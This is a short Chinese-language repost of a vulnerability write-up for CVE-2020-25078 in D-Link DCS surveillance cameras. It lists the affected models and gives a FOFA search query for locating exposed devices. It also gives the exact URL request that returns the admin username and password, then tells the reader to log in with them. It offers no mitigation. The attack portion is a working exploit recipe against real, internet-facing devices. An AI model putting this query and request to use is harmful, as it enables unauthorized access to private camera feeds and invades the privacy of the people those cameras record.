D-Link DCS系列监控账号密码信息泄露漏洞 CVE-2020-25078 - 走看看

zoukankan html css js c++ java

D-Link DCS系列监控账号密码信息泄露漏洞 CVE-2020-25078

漏洞描述

D-Link DCS系列监控通过访问特定的URL得到账号密码信息，攻击者通过漏洞进入后台可以获取视频监控页面

漏洞影响

Note

DCS-2530L DCS-2670L DCS-4603 DCS-4622 DCS-4701E DCS-4703E DCS-4705E DCS-4802E DCS-P703

FOFA

Note

app="D_Link-DCS-2530L"

访问登录界面

出现漏洞的 Url 为, 其中泄露了账号密码

1 http://xxx.xxx.xxx.xxx/config/getuser?index=0

使用泄露的账号密码登陆系统

查看全文

相关阅读:
Oracle select for update and for update nowait
Oracle DML , DDL , DCL
Shell变量的作用域：Shell全局变量、环境变量和局部变量
 Shell脚本的调试方法
 openlayers6地图全图以及框选截图导出功能(附源码下载)
Markdown基本语法
 sql 四大排名函数---（ROW_NUMBER、RANK、DENSE_RANK、NTILE）简介
 Newtonsoft.Json 去掉
 辽宁软考报名地址
 burp suite professional安装及使用教程

原文地址：https://www.cnblogs.com/lanyincao/p/14714683.html

Copyright © 2011-2022 走看看